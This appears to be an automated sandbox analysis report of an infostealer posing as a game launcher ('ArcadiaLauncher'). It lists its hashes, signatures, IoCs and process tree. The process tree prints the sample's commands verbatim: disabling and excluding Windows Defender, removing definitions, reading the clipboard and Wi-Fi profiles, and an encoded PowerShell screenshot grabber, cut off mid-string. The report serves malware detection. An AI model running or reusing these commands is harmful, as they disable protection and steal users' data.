Overview
overview
10Static
static
10Build/Arca...er.exe
windows7-x64
7Build/Arca...er.exe
windows10-2004-x64
8Build/Arca...le.dll
windows7-x64
8Build/Arca...le.dll
windows10-2004-x64
6Build/ArcadiaUI.exe
windows7-x64
7Build/ArcadiaUI.exe
windows10-2004-x64
8Build/Fast...ox.dll
windows7-x64
1Build/Fast...ox.dll
windows10-2004-x64
1Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-01-2025 15:46
Behavioral task
behavioral1
Sample
Build/ArcadiaLauncher.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Build/ArcadiaLauncher.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Build/ArcadiaModule.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
Build/ArcadiaModule.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Build/ArcadiaUI.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Build/ArcadiaUI.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
Build/FastColoredTextBox.dll
Resource
win7-20240708-en
Behavioral task
behavioral8
Sample
Build/FastColoredTextBox.dll
Resource
win10v2004-20241007-en
General
-
Target
Build/ArcadiaLauncher.exe
-
Size
9.6MB
-
MD5
935811dc5d515b089afe293d4471d215
-
SHA1
9e7d4ec78767b94752ec657fdd7dc5a83e6d1cd8
-
SHA256
d5be09b425b16925940fa291de9f802051e7cd366dbd6dba66742e334ef8dd90
-
SHA512
1aa7704c31971cd84dcffc31bedeff99b97fb589a2499a0a633d3dc6f80024d9fa19c347fa12530d92c597b1ab4eb2f89b98a5a127ace1af2b49edec9d7b6647
-
SSDEEP
196608:nd1dXlQZ5tLBxApPwfI9jUCnORird1KfbLOYgN2oc+nBIdAx3:dbiZ5tMpEIHOQ76bynnBIK
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4120 powershell.exe 876 powershell.exe 4036 powershell.exe 3756 powershell.exe 2428 powershell.exe 1248 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2324 cmd.exe 3912 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1600 bound.exe 4744 rar.exe -
Loads dropped DLL 18 IoCs
pid Process 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 2900 ArcadiaLauncher.exe 1600 bound.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 discord.com 21 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 3488 tasklist.exe 2436 tasklist.exe 4824 tasklist.exe -
resource yara_rule behavioral2/files/0x000a000000023b81-22.dat upx behavioral2/memory/2900-26-0x00007FFCD58B0000-0x00007FFCD5F71000-memory.dmp upx behavioral2/files/0x000a000000023b73-28.dat upx behavioral2/memory/2900-31-0x00007FFCE6C70000-0x00007FFCE6C95000-memory.dmp upx behavioral2/files/0x000a000000023b7f-32.dat upx behavioral2/files/0x000a000000023b7e-35.dat upx behavioral2/memory/2900-50-0x00007FFCECE00000-0x00007FFCECE0F000-memory.dmp upx behavioral2/files/0x000a000000023b7a-49.dat upx behavioral2/files/0x000a000000023b79-48.dat upx behavioral2/files/0x000a000000023b78-47.dat upx behavioral2/files/0x000a000000023b77-46.dat upx behavioral2/files/0x000a000000023b76-45.dat upx behavioral2/files/0x000a000000023b75-44.dat upx behavioral2/files/0x000a000000023b74-43.dat upx behavioral2/files/0x000a000000023b72-42.dat upx behavioral2/files/0x000a000000023b85-40.dat upx behavioral2/files/0x000a000000023b86-41.dat upx behavioral2/files/0x000a000000023b84-39.dat upx behavioral2/files/0x000a000000023b80-36.dat upx behavioral2/memory/2900-56-0x00007FFCE5260000-0x00007FFCE528C000-memory.dmp upx behavioral2/memory/2900-58-0x00007FFCEC930000-0x00007FFCEC949000-memory.dmp upx behavioral2/memory/2900-60-0x00007FFCE4E30000-0x00007FFCE4E54000-memory.dmp upx behavioral2/memory/2900-62-0x00007FFCD4F80000-0x00007FFCD50FF000-memory.dmp upx behavioral2/memory/2900-64-0x00007FFCE4F70000-0x00007FFCE4F89000-memory.dmp upx behavioral2/memory/2900-66-0x00007FFCE5BE0000-0x00007FFCE5BED000-memory.dmp upx behavioral2/memory/2900-68-0x00007FFCE4D80000-0x00007FFCE4DB3000-memory.dmp upx behavioral2/memory/2900-73-0x00007FFCD4EB0000-0x00007FFCD4F7E000-memory.dmp upx behavioral2/memory/2900-76-0x00007FFCE6C70000-0x00007FFCE6C95000-memory.dmp upx behavioral2/memory/2900-75-0x00007FFCD4970000-0x00007FFCD4EA3000-memory.dmp upx behavioral2/memory/2900-72-0x00007FFCD58B0000-0x00007FFCD5F71000-memory.dmp upx behavioral2/memory/2900-81-0x00007FFCE5260000-0x00007FFCE528C000-memory.dmp upx behavioral2/memory/2900-80-0x00007FFCE5480000-0x00007FFCE548D000-memory.dmp upx behavioral2/memory/2900-79-0x00007FFCE4D60000-0x00007FFCE4D74000-memory.dmp upx behavioral2/memory/2900-83-0x00007FFCEC930000-0x00007FFCEC949000-memory.dmp upx behavioral2/memory/2900-96-0x00007FFCE4E30000-0x00007FFCE4E54000-memory.dmp upx behavioral2/memory/2900-97-0x00007FFCD0E60000-0x00007FFCD0F7A000-memory.dmp upx behavioral2/memory/2900-103-0x00007FFCD4F80000-0x00007FFCD50FF000-memory.dmp upx behavioral2/memory/2900-120-0x00007FFCE4F70000-0x00007FFCE4F89000-memory.dmp upx behavioral2/memory/2900-289-0x00007FFCE4D80000-0x00007FFCE4DB3000-memory.dmp upx behavioral2/memory/2900-304-0x00007FFCD4970000-0x00007FFCD4EA3000-memory.dmp upx behavioral2/memory/2900-302-0x00007FFCD4EB0000-0x00007FFCD4F7E000-memory.dmp upx behavioral2/memory/2900-338-0x00007FFCE6C70000-0x00007FFCE6C95000-memory.dmp upx behavioral2/memory/2900-343-0x00007FFCD4F80000-0x00007FFCD50FF000-memory.dmp upx behavioral2/memory/2900-337-0x00007FFCD58B0000-0x00007FFCD5F71000-memory.dmp upx behavioral2/memory/2900-356-0x00007FFCEC930000-0x00007FFCEC949000-memory.dmp upx behavioral2/memory/2900-377-0x00007FFCE4D60000-0x00007FFCE4D74000-memory.dmp upx behavioral2/memory/2900-379-0x00007FFCD0E60000-0x00007FFCD0F7A000-memory.dmp upx behavioral2/memory/2900-378-0x00007FFCD4970000-0x00007FFCD4EA3000-memory.dmp upx behavioral2/memory/2900-376-0x00007FFCD4EB0000-0x00007FFCD4F7E000-memory.dmp upx behavioral2/memory/2900-375-0x00007FFCE4D80000-0x00007FFCE4DB3000-memory.dmp upx behavioral2/memory/2900-374-0x00007FFCE5BE0000-0x00007FFCE5BED000-memory.dmp upx behavioral2/memory/2900-373-0x00007FFCD4F80000-0x00007FFCD50FF000-memory.dmp upx behavioral2/memory/2900-372-0x00007FFCE4E30000-0x00007FFCE4E54000-memory.dmp upx behavioral2/memory/2900-371-0x00007FFCE4F70000-0x00007FFCE4F89000-memory.dmp upx behavioral2/memory/2900-370-0x00007FFCE5260000-0x00007FFCE528C000-memory.dmp upx behavioral2/memory/2900-369-0x00007FFCECE00000-0x00007FFCECE0F000-memory.dmp upx behavioral2/memory/2900-368-0x00007FFCE6C70000-0x00007FFCE6C95000-memory.dmp upx behavioral2/memory/2900-367-0x00007FFCE5480000-0x00007FFCE548D000-memory.dmp upx behavioral2/memory/2900-352-0x00007FFCD58B0000-0x00007FFCD5F71000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 816 cmd.exe 4964 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2948 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1424 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 4120 powershell.exe 4120 powershell.exe 3756 powershell.exe 876 powershell.exe 876 powershell.exe 4036 powershell.exe 4036 powershell.exe 3756 powershell.exe 3756 powershell.exe 1600 bound.exe 1600 bound.exe 3912 powershell.exe 3912 powershell.exe 1136 powershell.exe 1136 powershell.exe 4036 powershell.exe 876 powershell.exe 3912 powershell.exe 1136 powershell.exe 2428 powershell.exe 2428 powershell.exe 4008 powershell.exe 4008 powershell.exe 1248 powershell.exe 1248 powershell.exe 632 powershell.exe 632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4120 powershell.exe Token: SeDebugPrivilege 3756 powershell.exe Token: SeDebugPrivilege 2436 tasklist.exe Token: SeDebugPrivilege 3488 tasklist.exe Token: SeDebugPrivilege 876 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeIncreaseQuotaPrivilege 4492 WMIC.exe Token: SeSecurityPrivilege 4492 WMIC.exe Token: SeTakeOwnershipPrivilege 4492 WMIC.exe Token: SeLoadDriverPrivilege 4492 WMIC.exe Token: SeSystemProfilePrivilege 4492 WMIC.exe Token: SeSystemtimePrivilege 4492 WMIC.exe Token: SeProfSingleProcessPrivilege 4492 WMIC.exe Token: SeIncBasePriorityPrivilege 4492 WMIC.exe Token: SeCreatePagefilePrivilege 4492 WMIC.exe Token: SeBackupPrivilege 4492 WMIC.exe Token: SeRestorePrivilege 4492 WMIC.exe Token: SeShutdownPrivilege 4492 WMIC.exe Token: SeDebugPrivilege 4492 WMIC.exe Token: SeSystemEnvironmentPrivilege 4492 WMIC.exe Token: SeRemoteShutdownPrivilege 4492 WMIC.exe Token: SeUndockPrivilege 4492 WMIC.exe Token: SeManageVolumePrivilege 4492 WMIC.exe Token: 33 4492 WMIC.exe Token: 34 4492 WMIC.exe Token: 35 4492 WMIC.exe Token: 36 4492 WMIC.exe Token: SeDebugPrivilege 3912 powershell.exe Token: SeDebugPrivilege 4824 tasklist.exe Token: SeIncreaseQuotaPrivilege 4492 WMIC.exe Token: SeSecurityPrivilege 4492 WMIC.exe Token: SeTakeOwnershipPrivilege 4492 WMIC.exe Token: SeLoadDriverPrivilege 4492 WMIC.exe Token: SeSystemProfilePrivilege 4492 WMIC.exe Token: SeSystemtimePrivilege 4492 WMIC.exe Token: SeProfSingleProcessPrivilege 4492 WMIC.exe Token: SeIncBasePriorityPrivilege 4492 WMIC.exe Token: SeCreatePagefilePrivilege 4492 WMIC.exe Token: SeBackupPrivilege 4492 WMIC.exe Token: SeRestorePrivilege 4492 WMIC.exe Token: SeShutdownPrivilege 4492 WMIC.exe Token: SeDebugPrivilege 4492 WMIC.exe Token: SeSystemEnvironmentPrivilege 4492 WMIC.exe Token: SeRemoteShutdownPrivilege 4492 WMIC.exe Token: SeUndockPrivilege 4492 WMIC.exe Token: SeManageVolumePrivilege 4492 WMIC.exe Token: 33 4492 WMIC.exe Token: 34 4492 WMIC.exe Token: 35 4492 WMIC.exe Token: 36 4492 WMIC.exe Token: SeDebugPrivilege 1136 powershell.exe Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 4008 powershell.exe Token: SeIncreaseQuotaPrivilege 3388 WMIC.exe Token: SeSecurityPrivilege 3388 WMIC.exe Token: SeTakeOwnershipPrivilege 3388 WMIC.exe Token: SeLoadDriverPrivilege 3388 WMIC.exe Token: SeSystemProfilePrivilege 3388 WMIC.exe Token: SeSystemtimePrivilege 3388 WMIC.exe Token: SeProfSingleProcessPrivilege 3388 WMIC.exe Token: SeIncBasePriorityPrivilege 3388 WMIC.exe Token: SeCreatePagefilePrivilege 3388 WMIC.exe Token: SeBackupPrivilege 3388 WMIC.exe Token: SeRestorePrivilege 3388 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5084 wrote to memory of 2900 5084 ArcadiaLauncher.exe 83 PID 5084 wrote to memory of 2900 5084 ArcadiaLauncher.exe 83 PID 2900 wrote to memory of 2072 2900 ArcadiaLauncher.exe 84 PID 2900 wrote to memory of 2072 2900 ArcadiaLauncher.exe 84 PID 2900 wrote to memory of 1004 2900 ArcadiaLauncher.exe 85 PID 2900 wrote to memory of 1004 2900 ArcadiaLauncher.exe 85 PID 2072 wrote to memory of 4120 2072 cmd.exe 88 PID 2072 wrote to memory of 4120 2072 cmd.exe 88 PID 2900 wrote to memory of 2228 2900 ArcadiaLauncher.exe 89 PID 2900 wrote to memory of 2228 2900 ArcadiaLauncher.exe 89 PID 2900 wrote to memory of 792 2900 ArcadiaLauncher.exe 90 PID 2900 wrote to memory of 792 2900 ArcadiaLauncher.exe 90 PID 2900 wrote to memory of 2660 2900 ArcadiaLauncher.exe 91 PID 2900 wrote to memory of 2660 2900 ArcadiaLauncher.exe 91 PID 1004 wrote to memory of 3756 1004 cmd.exe 95 PID 1004 wrote to memory of 3756 1004 cmd.exe 95 PID 2900 wrote to memory of 3144 2900 ArcadiaLauncher.exe 96 PID 2900 wrote to memory of 3144 2900 ArcadiaLauncher.exe 96 PID 2900 wrote to memory of 3512 2900 ArcadiaLauncher.exe 97 PID 2900 wrote to memory of 3512 2900 ArcadiaLauncher.exe 97 PID 2900 wrote to memory of 632 2900 ArcadiaLauncher.exe 100 PID 2900 wrote to memory of 632 2900 ArcadiaLauncher.exe 100 PID 2900 wrote to memory of 2324 2900 ArcadiaLauncher.exe 101 PID 2900 wrote to memory of 2324 2900 ArcadiaLauncher.exe 101 PID 792 wrote to memory of 1600 792 cmd.exe 141 PID 792 wrote to memory of 1600 792 cmd.exe 141 PID 2660 wrote to memory of 876 2660 cmd.exe 106 PID 2660 wrote to memory of 876 2660 cmd.exe 106 PID 2900 wrote to memory of 4940 2900 ArcadiaLauncher.exe 108 PID 2900 wrote to memory of 4940 2900 ArcadiaLauncher.exe 108 PID 3144 wrote to memory of 3488 3144 cmd.exe 109 PID 3144 wrote to memory of 3488 3144 cmd.exe 109 PID 2228 wrote to memory of 4036 2228 cmd.exe 107 PID 2228 wrote to memory of 4036 2228 cmd.exe 107 PID 3512 wrote to memory of 2436 3512 cmd.exe 111 PID 3512 wrote to memory of 2436 3512 cmd.exe 111 PID 2900 wrote to memory of 1268 2900 ArcadiaLauncher.exe 112 PID 2900 wrote to memory of 1268 2900 ArcadiaLauncher.exe 112 PID 2900 wrote to memory of 816 2900 ArcadiaLauncher.exe 113 PID 2900 wrote to memory of 816 2900 ArcadiaLauncher.exe 113 PID 2900 wrote to memory of 4240 2900 ArcadiaLauncher.exe 115 PID 2900 wrote to memory of 4240 2900 ArcadiaLauncher.exe 115 PID 632 wrote to memory of 4492 632 cmd.exe 117 PID 632 wrote to memory of 4492 632 cmd.exe 117 PID 2900 wrote to memory of 5096 2900 ArcadiaLauncher.exe 118 PID 2900 wrote to memory of 5096 2900 ArcadiaLauncher.exe 118 PID 2324 wrote to memory of 3912 2324 cmd.exe 121 PID 2324 wrote to memory of 3912 2324 cmd.exe 121 PID 4940 wrote to memory of 4824 4940 cmd.exe 122 PID 4940 wrote to memory of 4824 4940 cmd.exe 122 PID 1268 wrote to memory of 4672 1268 cmd.exe 124 PID 1268 wrote to memory of 4672 1268 cmd.exe 124 PID 4240 wrote to memory of 1424 4240 cmd.exe 125 PID 4240 wrote to memory of 1424 4240 cmd.exe 125 PID 816 wrote to memory of 4964 816 cmd.exe 126 PID 816 wrote to memory of 4964 816 cmd.exe 126 PID 5096 wrote to memory of 1136 5096 cmd.exe 127 PID 5096 wrote to memory of 1136 5096 cmd.exe 127 PID 2900 wrote to memory of 4428 2900 ArcadiaLauncher.exe 128 PID 2900 wrote to memory of 4428 2900 ArcadiaLauncher.exe 128 PID 4428 wrote to memory of 4856 4428 cmd.exe 130 PID 4428 wrote to memory of 4856 4428 cmd.exe 130 PID 2900 wrote to memory of 4692 2900 ArcadiaLauncher.exe 131 PID 2900 wrote to memory of 4692 2900 ArcadiaLauncher.exe 131
Processes
-
C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaLauncher.exe"C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaLauncher.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaLauncher.exe"C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaLauncher.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaLauncher.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Build\ArcadiaLauncher.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAA